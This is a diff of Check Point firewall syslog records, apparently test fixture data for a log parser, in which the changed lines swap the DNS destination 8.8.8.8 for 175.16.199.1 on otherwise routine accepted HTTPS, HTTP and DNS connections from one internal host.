 <134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x1f,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"33"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"151.101.37.108"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"37762"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x20,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"34"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44414"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x20,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"34"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44414"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x21,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"35"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"188.40.137.18"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"49820"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x22,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"36"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60192"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x23,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"37"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38597"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x22,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"36"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60192"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x23,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"37"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38597"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x24,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"38"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"188.40.137.18"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"49822"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x25,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"39"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"172.217.17.35"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51528"; service:"80"; service_id:"http"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x26,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"40"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"188.40.137.18"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"49826"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x27,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"41"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"104.81.140.246"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"57410"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x28,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"42"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37940"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x29,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"43"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59816"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x28,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"42"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37940"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x29,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"43"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59816"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x2a,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"44"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"172.217.17.102"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50004"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x2b,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"45"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"172.217.20.65"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"37704"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x2c,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"46"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52820"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x2d,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"47"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44623"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x2c,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"46"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52820"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x2d,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"47"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44623"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x2e,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"48"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"13.224.227.14"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"48632"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x2f,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"49"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38065"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x2f,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"49"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38065"; 
service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x30,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"50"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"104.17.64.4"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"49320"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x31,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"51"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"172.217.168.194"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38520"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T17:21:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x32,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38808"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:21:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x32,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38808"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:21:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d918,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"151.139.128.14"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50128"; service:"80"; service_id:"http"; 
